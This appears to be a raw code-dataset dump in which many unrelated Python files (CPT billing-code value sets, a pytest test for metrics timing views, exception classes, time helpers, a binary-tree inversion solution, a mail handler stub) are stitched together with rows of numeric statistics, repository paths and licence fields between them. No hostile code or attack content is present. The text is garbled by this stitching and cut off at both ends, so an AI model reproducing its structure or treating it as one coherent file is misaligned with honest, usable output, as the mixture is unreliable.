EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'99429'
}
class PsychotherapyAndPharmacologicManagement(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent psychotherapy services.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with identifying psychotherapy services.
**Exclusion Criteria:** No exclusions.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1055'
VALUE_SET_NAME = 'Psychotherapy and Pharmacologic Management'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'90845',
'90847',
'90849',
'90853',
'90875',
'90876'
}
class TelehealthServices(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent telehealth services.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with identifying telehealth services, including telephone and online evaluation and management services.
**Exclusion Criteria:** No exclusions.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1031'
VALUE_SET_NAME = 'Telehealth Services'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'98966',
'98967',
'98968',
'99441',
'99442',
'99443'
}
class TelephoneEvaluation(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent telephone evaluations.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with identifying evaluation and management services to a patient by telephone. This is a grouping of CPT codes.
**Exclusion Criteria:** Excludes telephone evaluation and management services that last for less than five minutes.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1082'
VALUE_SET_NAME = 'Telephone Evaluation'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'99441',
'99442',
'99443'
}
class TelephoneManagement(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent telephone management.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with all relevant codes used to identify assessment and management services to a patient by telephone. This is a grouping of CPT codes.
**Exclusion Criteria:** Excludes telephone assessment and management services that last for less than five minutes.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1053'
VALUE_SET_NAME = 'Telephone Management'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'98966',
'98967',
'98968'
}
class TelephoneVisits(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent telephone visits.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with identifying assessment, evaluation and management services to a patient by telephone. This is a grouping of CPT codes.
**Exclusion Criteria:** Excludes telephone assessment, evaluation and management services that last for less than five minutes.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1080'
VALUE_SET_NAME = 'Telephone Visits'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'98966',
'98967',
'98968',
'99441',
'99442',
'99443'
}
| 32.679144
| 427
| 0.643975
| 4,160
| 36,666
| 5.650962
| 0.16226
| 0.039816
| 0.034712
| 0.036158
| 0.740471
| 0.733665
| 0.718862
| 0.710184
| 0.684873
| 0.655649
| 0
| 0.165508
| 0.258796
| 36,666
| 1,122
| 428
| 32.679144
| 0.699489
| 0.515928
| 0
| 0.361429
| 0
| 0.047143
| 0.374963
| 0.08009
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.001429
| 0
| 0.262857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
1c70fd09196f88cc8792033f09a381c97eb2dae7
| 51
|
py
|
Python
|
asreviewcontrib/models/__init__.py
|
JTeijema/asreview-XGBoost
|
a682088ef51c6e771be62376f6150f3c9a22726f
|
[
"MIT"
] | null | null | null |
asreviewcontrib/models/__init__.py
|
JTeijema/asreview-XGBoost
|
a682088ef51c6e771be62376f6150f3c9a22726f
|
[
"MIT"
] | null | null | null |
asreviewcontrib/models/__init__.py
|
JTeijema/asreview-XGBoost
|
a682088ef51c6e771be62376f6150f3c9a22726f
|
[
"MIT"
] | null | null | null |
from asreviewcontrib.models.xgboost import XGBoost
| 25.5
| 50
| 0.882353
| 6
| 51
| 7.5
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078431
| 51
| 1
| 51
| 51
| 0.957447
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
1c74b0a5a64db90f3d61758f1cf85c90c5405b0d
| 3,402
|
py
|
Python
|
tests/unit/metrics/test_views.py
|
fairhopeweb/warehouse
|
7d8ef742e8fe6b401190c28ce56761848041c89f
|
[
"Apache-2.0"
] | 3,103
|
2015-01-30T00:24:10.000Z
|
2022-03-31T23:21:39.000Z
|
tests/unit/metrics/test_views.py
|
fairhopeweb/warehouse
|
7d8ef742e8fe6b401190c28ce56761848041c89f
|
[
"Apache-2.0"
] | 6,709
|
2015-01-05T01:23:20.000Z
|
2022-03-31T14:49:46.000Z
|
tests/unit/metrics/test_views.py
|
fairhopeweb/warehouse
|
7d8ef742e8fe6b401190c28ce56761848041c89f
|
[
"Apache-2.0"
] | 959
|
2015-01-12T22:22:40.000Z
|
2022-03-31T22:21:51.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pretend
import pytest
from warehouse.metrics import views
class TestTimingView:
@pytest.mark.parametrize("route", [None, "foo"])
def test_unknown_view(self, pyramid_services, metrics, route):
response = pretend.stub()
view = pretend.call_recorder(lambda request, context: response)
view_info = pretend.stub(original_view=pretend.stub())
derived = views.timing_view(view, view_info)
request = pretend.stub(
matched_route=pretend.stub(name=route) if route else None,
find_service=pyramid_services.find_service,
)
context = pretend.stub()
route_tag = "route:null" if route is None else f"route:{route}"
assert derived(context, request) is response
assert view.calls == [pretend.call(context, request)]
assert metrics.timed.calls == [
pretend.call("pyramid.view.duration", tags=[route_tag, "view:unknown"])
]
@pytest.mark.parametrize("route", [None, "foo"])
def test_qualname_view(self, pyramid_services, metrics, route):
response = pretend.stub()
view = pretend.call_recorder(lambda request, context: response)
view_info = pretend.stub(
original_view=pretend.stub(
__module__="foo", __qualname__="bar", __name__="other"
)
)
derived = views.timing_view(view, view_info)
request = pretend.stub(
matched_route=pretend.stub(name=route) if route else None,
find_service=pyramid_services.find_service,
)
context = pretend.stub()
route_tag = "route:null" if route is None else f"route:{route}"
assert derived(context, request) is response
assert view.calls == [pretend.call(context, request)]
assert metrics.timed.calls == [
pretend.call("pyramid.view.duration", tags=[route_tag, "view:foo.bar"])
]
@pytest.mark.parametrize("route", [None, "foo"])
def test_name_view(self, pyramid_services, metrics, route):
response = pretend.stub()
view = pretend.call_recorder(lambda request, context: response)
view_info = pretend.stub(
original_view=pretend.stub(__module__="foo", __name__="other")
)
derived = views.timing_view(view, view_info)
request = pretend.stub(
matched_route=pretend.stub(name=route) if route else None,
find_service=pyramid_services.find_service,
)
context = pretend.stub()
route_tag = "route:null" if route is None else f"route:{route}"
assert derived(context, request) is response
assert view.calls == [pretend.call(context, request)]
assert metrics.timed.calls == [
pretend.call("pyramid.view.duration", tags=[route_tag, "view:foo.other"])
]
| 37.384615
| 85
| 0.65726
| 415
| 3,402
| 5.238554
| 0.262651
| 0.091076
| 0.044158
| 0.035879
| 0.75345
| 0.75345
| 0.75345
| 0.75345
| 0.698252
| 0.698252
| 0
| 0.001541
| 0.236919
| 3,402
| 90
| 86
| 37.8
| 0.835901
| 0.151969
| 0
| 0.622951
| 0
| 0
| 0.074139
| 0.021928
| 0
| 0
| 0
| 0
| 0.147541
| 1
| 0.04918
| false
| 0
| 0.04918
| 0
| 0.114754
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
1c79577f872548a5d5886526761ff4851196704e
| 59
|
py
|
Python
|
hwt/synthesizer/__init__.py
|
mgielda/hwt
|
e6c699fb154f93ac03523bfe40a3d4fc1912d28b
|
[
"MIT"
] | null | null | null |
hwt/synthesizer/__init__.py
|
mgielda/hwt
|
e6c699fb154f93ac03523bfe40a3d4fc1912d28b
|
[
"MIT"
] | null | null | null |
hwt/synthesizer/__init__.py
|
mgielda/hwt
|
e6c699fb154f93ac03523bfe40a3d4fc1912d28b
|
[
"MIT"
] | null | null | null |
"""
Sythesizer converts Unit instances to HDL objects.
"""
| 14.75
| 50
| 0.728814
| 7
| 59
| 6.142857
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152542
| 59
| 3
| 51
| 19.666667
| 0.86
| 0.847458
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
1c8935e8e91733a5abdff56316f774bca0712f8c
| 127
|
py
|
Python
|
hornero/__init__.py
|
santisoler/hornero
|
7eb0c32625e00b858e34c87633c8c3c4618dc40a
|
[
"MIT"
] | 1
|
2021-11-22T18:24:19.000Z
|
2021-11-22T18:24:19.000Z
|
hornero/__init__.py
|
santisoler/hornero
|
7eb0c32625e00b858e34c87633c8c3c4618dc40a
|
[
"MIT"
] | null | null | null |
hornero/__init__.py
|
santisoler/hornero
|
7eb0c32625e00b858e34c87633c8c3c4618dc40a
|
[
"MIT"
] | null | null | null |
"""
Hornero: A package selector for building your comfy nest.
"""
from . import _version
__version__ = f"v{_version.version}"
| 18.142857
| 57
| 0.732283
| 17
| 127
| 5.117647
| 0.823529
| 0.321839
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.149606
| 127
| 6
| 58
| 21.166667
| 0.805556
| 0.448819
| 0
| 0
| 0
| 0
| 0.306452
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
1c8fddc8b884c7668e38237571aace14327a4029
| 1,517
|
py
|
Python
|
haloinfinite/exceptions.py
|
ingmferrer/haloinfinite
|
9d85f775129148d0226ff416c574aa619c290246
|
[
"MIT"
] | 2
|
2022-02-06T04:59:08.000Z
|
2022-02-09T18:18:48.000Z
|
haloinfinite/exceptions.py
|
ingmferrer/haloinfinite
|
9d85f775129148d0226ff416c574aa619c290246
|
[
"MIT"
] | null | null | null |
haloinfinite/exceptions.py
|
ingmferrer/haloinfinite
|
9d85f775129148d0226ff416c574aa619c290246
|
[
"MIT"
] | null | null | null |
class BaseError(Exception):
pass
class UserTokenRequiredError(BaseError):
pass
class XboxUserTokenRequiredError(BaseError):
pass
class XstsXboxTokenRequiredError(BaseError):
pass
class XstsHaloTokenRequiredError(BaseError):
pass
class SpartanTokenRequiredError(BaseError):
pass
class ClearanceTokenRequiredError(BaseError):
pass
class TokenExpiredError(BaseError):
pass
class UnknownError(BaseError):
pass
class BadRequestError(BaseError):
pass
class UnauthorizedError(BaseError):
pass
class ForbiddenError(BaseError):
pass
class NotFoundError(BaseError):
pass
class MethodNotAllowedError(BaseError):
pass
class NotAcceptableError(BaseError):
pass
class ConflictError(BaseError):
pass
class GoneError(BaseError):
pass
class LengthRequiredError(BaseError):
pass
class PreconditionFailedError(BaseError):
pass
class RequestEntityTooLargeError(BaseError):
pass
class UnsupportedMediaTypeError(BaseError):
pass
class RequestedRangeNotSatisfiableError(BaseError):
pass
class UnprocessableEntityError(BaseError):
pass
class TooManyRequestsError(BaseError):
pass
class InternalServerErrorError(BaseError):
pass
class NotImplementedAPIError(BaseError):
pass
class ServiceUnavailableError(BaseError):
pass
class GatewayTimeoutError(BaseError):
pass
class InsufficientStorageError(BaseError):
pass
class BandwidthLimitExceededError(BaseError):
pass
| 12.747899
| 51
| 0.764008
| 120
| 1,517
| 9.658333
| 0.275
| 0.225194
| 0.434858
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.176664
| 1,517
| 118
| 52
| 12.855932
| 0.927942
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 4
|
98ea0799ea7742f077d8c48d8a9462b6d17c0b0b
| 238
|
py
|
Python
|
byceps/blueprints/api/v1/views.py
|
homeworkprod/byceps
|
cd0f9f37f7b5eb517106ec761acc7e0bdf75e22e
|
[
"BSD-3-Clause"
] | 23
|
2015-08-03T23:28:54.000Z
|
2018-12-12T20:11:45.000Z
|
byceps/blueprints/api/v1/views.py
|
homeworkprod/byceps
|
cd0f9f37f7b5eb517106ec761acc7e0bdf75e22e
|
[
"BSD-3-Clause"
] | 1
|
2018-09-30T18:18:24.000Z
|
2018-09-30T18:18:24.000Z
|
byceps/blueprints/api/v1/views.py
|
homeworkprod/byceps
|
cd0f9f37f7b5eb517106ec761acc7e0bdf75e22e
|
[
"BSD-3-Clause"
] | 9
|
2015-08-06T16:41:36.000Z
|
2018-09-25T11:17:31.000Z
|
"""
byceps.blueprints.api.v1.views
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:Copyright: 2014-2022 Jochen Kupperschmidt
:License: Revised BSD (see `LICENSE` file for details)
"""
from flask import Blueprint
blueprint = Blueprint('v1', __name__)
| 18.307692
| 54
| 0.651261
| 26
| 238
| 5.807692
| 0.846154
| 0.238411
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.047619
| 0.117647
| 238
| 12
| 55
| 19.833333
| 0.671429
| 0.672269
| 0
| 0
| 0
| 0
| 0.028571
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 1
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
|
0
| 4
|
c70627cb60718bb1d01ad43d527256723bb0ead0
| 158
|
py
|
Python
|
lib/galaxy/util/log/__init__.py
|
ramezrawas/galaxy-1
|
c03748dd49c060a68d07bce56eae33e0ba154414
|
[
"CC-BY-3.0"
] | 6
|
2018-11-03T22:43:35.000Z
|
2022-02-15T17:51:33.000Z
|
lib/galaxy/util/log/__init__.py
|
igorhollaender/OBSOLETE_sirv_dashboard
|
85aec60b80ef6f561d89398e3da5963d3d0f2aa4
|
[
"CC-BY-3.0"
] | 7
|
2016-12-07T22:19:37.000Z
|
2019-01-30T15:04:26.000Z
|
lib/galaxy/util/log/__init__.py
|
igorhollaender/OBSOLETE_sirv_dashboard
|
85aec60b80ef6f561d89398e3da5963d3d0f2aa4
|
[
"CC-BY-3.0"
] | 10
|
2017-04-10T21:40:22.000Z
|
2022-02-21T16:50:10.000Z
|
class TraceLogger( object ):
def __init__( self, name ):
self.name = name
def log( **kwargs ):
raise TypeError( "Abstract Method" )
| 19.75
| 44
| 0.588608
| 17
| 158
| 5.235294
| 0.764706
| 0.179775
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.297468
| 158
| 7
| 45
| 22.571429
| 0.801802
| 0
| 0
| 0
| 0
| 0
| 0.094937
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 4
|
c722f84eaa456f148c71ca46fda31f179c84c807
| 194
|
py
|
Python
|
utils/time_util.py
|
gregbugaj/TextGenerator
|
d92431bdce31914a108417f7b00ed80b8f994298
|
[
"MIT"
] | 166
|
2019-10-08T09:26:42.000Z
|
2022-03-29T22:27:30.000Z
|
utils/time_util.py
|
gregbugaj/TextGenerator
|
d92431bdce31914a108417f7b00ed80b8f994298
|
[
"MIT"
] | 17
|
2019-12-18T02:07:13.000Z
|
2022-03-04T06:40:54.000Z
|
utils/time_util.py
|
gregbugaj/TextGenerator
|
d92431bdce31914a108417f7b00ed80b8f994298
|
[
"MIT"
] | 47
|
2019-11-24T08:04:20.000Z
|
2022-03-23T00:43:33.000Z
|
from datetime import datetime
def today():
time = datetime.now()
return time.strftime("%Y%m%d")
def timestamp():
time = datetime.now()
return time.strftime("%Y%m%d%H%M%S%f")
| 16.166667
| 42
| 0.628866
| 30
| 194
| 4.066667
| 0.533333
| 0.196721
| 0.245902
| 0.344262
| 0.590164
| 0.590164
| 0.590164
| 0.590164
| 0.590164
| 0
| 0
| 0
| 0.195876
| 194
| 11
| 43
| 17.636364
| 0.782051
| 0
| 0
| 0.285714
| 0
| 0
| 0.103093
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0.142857
| 0
| 0.714286
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 4
|
c7274492c1f1ca99699a6e6e50e02a211a7cd725
| 110
|
py
|
Python
|
rainforest/common/__init__.py
|
gugerlir/rainforest
|
85a9d51acf2036245f0cebf7232e735c2cf2dfc4
|
[
"BSD-3-Clause"
] | 3
|
2020-03-03T19:58:02.000Z
|
2021-11-02T08:22:22.000Z
|
rainforest/common/__init__.py
|
gugerlir/rainforest
|
85a9d51acf2036245f0cebf7232e735c2cf2dfc4
|
[
"BSD-3-Clause"
] | null | null | null |
rainforest/common/__init__.py
|
gugerlir/rainforest
|
85a9d51acf2036245f0cebf7232e735c2cf2dfc4
|
[
"BSD-3-Clause"
] | 5
|
2020-03-25T15:25:25.000Z
|
2021-06-11T22:15:58.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue May 8 16:07:04 2018
@author: wolfensb
"""
| 13.75
| 35
| 0.6
| 18
| 110
| 3.666667
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.144444
| 0.181818
| 110
| 7
| 36
| 15.714286
| 0.588889
| 0.890909
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
c73765f456b8eca666b221dc591c42583c4f30be
| 105
|
py
|
Python
|
tests/exporting/__init__.py
|
MyPyDavid/raman_fitting
|
a827ab578ae801e185384159f145ae4dfad39549
|
[
"MIT"
] | 3
|
2021-03-03T21:02:11.000Z
|
2021-05-14T09:24:40.000Z
|
tests/exporting/__init__.py
|
MyPyDavid/raman_fitting
|
a827ab578ae801e185384159f145ae4dfad39549
|
[
"MIT"
] | 8
|
2021-06-25T22:54:53.000Z
|
2021-08-09T10:07:30.000Z
|
tests/exporting/__init__.py
|
MyPyDavid/raman_fitting
|
a827ab578ae801e185384159f145ae4dfad39549
|
[
"MIT"
] | 2
|
2021-07-08T09:49:49.000Z
|
2022-03-19T14:43:01.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri May 28 09:04:40 2021
@author: zmg
"""
| 13.125
| 35
| 0.590476
| 18
| 105
| 3.444444
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162791
| 0.180952
| 105
| 7
| 36
| 15
| 0.55814
| 0.885714
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
c73aa8b42f03927cae156ec60827e9be41935e75
| 128
|
py
|
Python
|
run.py
|
cwvanharen/bnbot
|
ed9c6ddec817fbc35ee12a7984acf36ada10ebd1
|
[
"MIT"
] | 2
|
2016-08-24T12:15:46.000Z
|
2018-08-08T09:24:49.000Z
|
run.py
|
AWSGovardhan/iris-app
|
ad5aad4371c34b10ac31eefc7a4ccf262095c2a8
|
[
"MIT"
] | null | null | null |
run.py
|
AWSGovardhan/iris-app
|
ad5aad4371c34b10ac31eefc7a4ccf262095c2a8
|
[
"MIT"
] | 2
|
2016-04-05T01:49:45.000Z
|
2016-08-24T12:15:52.000Z
|
#!/usr/bin/env python
from app import app as application
if __name__ == '__main__':
application.run(port=9000, debug=True)
| 21.333333
| 42
| 0.726563
| 19
| 128
| 4.473684
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.036697
| 0.148438
| 128
| 5
| 43
| 25.6
| 0.743119
| 0.15625
| 0
| 0
| 0
| 0
| 0.074766
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
c767fc157295d6a65e7106817d5af97c8fc628cc
| 86
|
py
|
Python
|
xclim/data/__init__.py
|
Ouranosinc/dcvar
|
0737c66a36f8969e7a17276990bc7e76f7b410c4
|
[
"Apache-2.0"
] | 1
|
2018-08-20T16:36:40.000Z
|
2018-08-20T16:36:40.000Z
|
xclim/data/__init__.py
|
Ouranosinc/dcvar
|
0737c66a36f8969e7a17276990bc7e76f7b410c4
|
[
"Apache-2.0"
] | 3
|
2018-08-23T13:25:47.000Z
|
2018-08-23T15:59:45.000Z
|
xclim/data/__init__.py
|
Ouranosinc/dcvar
|
0737c66a36f8969e7a17276990bc7e76f7b410c4
|
[
"Apache-2.0"
] | null | null | null |
"""JSON and YAML definitions for virtual modules and internationalisation support."""
| 43
| 85
| 0.802326
| 10
| 86
| 6.9
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116279
| 86
| 1
| 86
| 86
| 0.907895
| 0.918605
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
c76dd3fa81cc2ee16f6e95ceaef5ef446e63422b
| 895
|
py
|
Python
|
src/q226-invert-binary-tree.py
|
jiaju-yang/leetcode
|
3af140a334c7d5457b64ae8813ddba284c66e57f
|
[
"MIT"
] | null | null | null |
src/q226-invert-binary-tree.py
|
jiaju-yang/leetcode
|
3af140a334c7d5457b64ae8813ddba284c66e57f
|
[
"MIT"
] | null | null | null |
src/q226-invert-binary-tree.py
|
jiaju-yang/leetcode
|
3af140a334c7d5457b64ae8813ddba284c66e57f
|
[
"MIT"
] | null | null | null |
#
# @lc app=leetcode id=226 lang=python3
#
# [226] Invert Binary Tree
#
from .tree_tools import *
from typing import Optional
# @lc code=start
class Solution:
def invertTree(self, root: Optional[TreeNode]) -> Optional[TreeNode]:
return self.dfs(root)
def dfs(self, node):
if not node:
return
node.left, node.right = self.dfs(node.right), self.dfs(node.left)
return node
# @lc code=end
solve = Solution().invertTree
def test_default():
assert solve(construct_tree([4, 2, 7, 1, 3, 6, 9])
) == construct_tree([4, 7, 2, 9, 6, 3, 1])
assert solve(construct_tree([2, 1, 3])) == construct_tree([2, 3, 1])
def test_corner_cases():
assert solve(construct_tree([])) == construct_tree([])
assert solve(construct_tree([1])) == construct_tree([1])
assert not solve(construct_tree([1])) == construct_tree([2])
| 24.189189
| 73
| 0.627933
| 126
| 895
| 4.349206
| 0.365079
| 0.237226
| 0.164234
| 0.175182
| 0.182482
| 0.116788
| 0
| 0
| 0
| 0
| 0
| 0.044286
| 0.217877
| 895
| 36
| 74
| 24.861111
| 0.738571
| 0.099441
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.263158
| 1
| 0.210526
| false
| 0
| 0.105263
| 0.052632
| 0.526316
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 4
|
c781e4ce149da3a85dae88e0b8d2425d22b9e0c0
| 110
|
py
|
Python
|
Oefeningen/standalone/for.py
|
Seviran/Python_3
|
e30ead250129d25bbc0a7ee2f6298775b2f4529a
|
[
"MIT"
] | null | null | null |
Oefeningen/standalone/for.py
|
Seviran/Python_3
|
e30ead250129d25bbc0a7ee2f6298775b2f4529a
|
[
"MIT"
] | null | null | null |
Oefeningen/standalone/for.py
|
Seviran/Python_3
|
e30ead250129d25bbc0a7ee2f6298775b2f4529a
|
[
"MIT"
] | null | null | null |
for count in range(1,10):
print(count)
print(count * count)
for letter in "coffee":
print(letter)
| 18.333333
| 25
| 0.645455
| 17
| 110
| 4.176471
| 0.529412
| 0.28169
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035294
| 0.227273
| 110
| 6
| 26
| 18.333333
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0.054054
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.6
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 4
|
c7915917cdb6b7e7703853d131223a42385f98be
| 168
|
py
|
Python
|
workers/mail_handlers/base_handler.py
|
mmedum/limbo
|
8aff181a1616bc4941b29fcd75e33e7943a105ea
|
[
"MIT"
] | 1
|
2019-08-22T03:59:27.000Z
|
2019-08-22T03:59:27.000Z
|
workers/mail_handlers/base_handler.py
|
mmedum/limbo
|
8aff181a1616bc4941b29fcd75e33e7943a105ea
|
[
"MIT"
] | 1
|
2018-12-23T14:18:40.000Z
|
2018-12-23T14:18:40.000Z
|
workers/mail_handlers/base_handler.py
|
mmedum/limbo
|
8aff181a1616bc4941b29fcd75e33e7943a105ea
|
[
"MIT"
] | null | null | null |
class BaseHandler:
'''Abstract handler for send emails'''
